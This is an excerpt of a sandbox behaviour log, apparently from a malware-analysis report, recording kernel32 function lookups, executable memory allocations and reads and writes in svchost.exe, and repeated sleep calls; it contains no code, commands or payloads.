Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 13	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 13	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004058, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 24	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1000405c, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 27	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 27	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004060, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 6	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004064, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 20	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004068, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 28	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1000406c, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryW, address_out = 0x76b63c01	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 26	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 12	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 14	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
For performance reasons, the remaining 10275 entries are omitted. The remaining entries can be found in glog.xml.

Thread 0x9e4

1288

Category	Operation	Information	Count	Logfile
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1287	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:32:42 (UTC)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 20	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	74	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:32:43 (UTC)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 3538944, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x360000, size = 20	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 3538944, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	161	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 15595537, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 15595588, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 15595372, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	5	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	134	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049638, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 269384968, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049148, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049632, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 269385068, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049148, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049638, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 269385016, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049148, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049632, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 269385092, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049148, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24442157, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24442403, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24440860, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	25	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28178715, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28177444, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28177400, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	147	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28701247, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28701279, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28699872, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28701241, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28701253, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28699872, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28701583, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28701548, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28699872, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28701235, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28701305, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28699872, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28702865, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28703111, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28701568, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	110	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	20	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	25	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28309300, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 3776592, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 28309028, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	4	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	25	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	16	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049232, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 3782224, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24048948, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	14	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	30	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	27	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268452188, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 8059264, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268454376, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268452188, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268454388, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268454376, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	29	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	24	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	30	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	26	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	18	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050369, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050321, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049588, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050374, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050166, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049588, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050364, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050135, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24049588, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050131, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050235, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24048344, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050291, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050318, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050112, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050285, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050314, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050108, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	1	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050290, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050317, size = 1023	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 24050112, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	4	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	25	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	31	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	27	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	31	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	23	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	31	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	24	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	31	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	18	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	30	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	25	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	31	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	23	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 268848156, size = 127	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 16318048, size = 1023	1	Fn
Memory	Read	process_name = svchost.exe, address = 16318008, size = 127	1	Fn Data
System	Sleep	duration = 3000 milliseconds (3.000 seconds)	31	Fn
Memory	Read	process_name = svchost.exe, address = 393268, size = 28	1	Fn Data
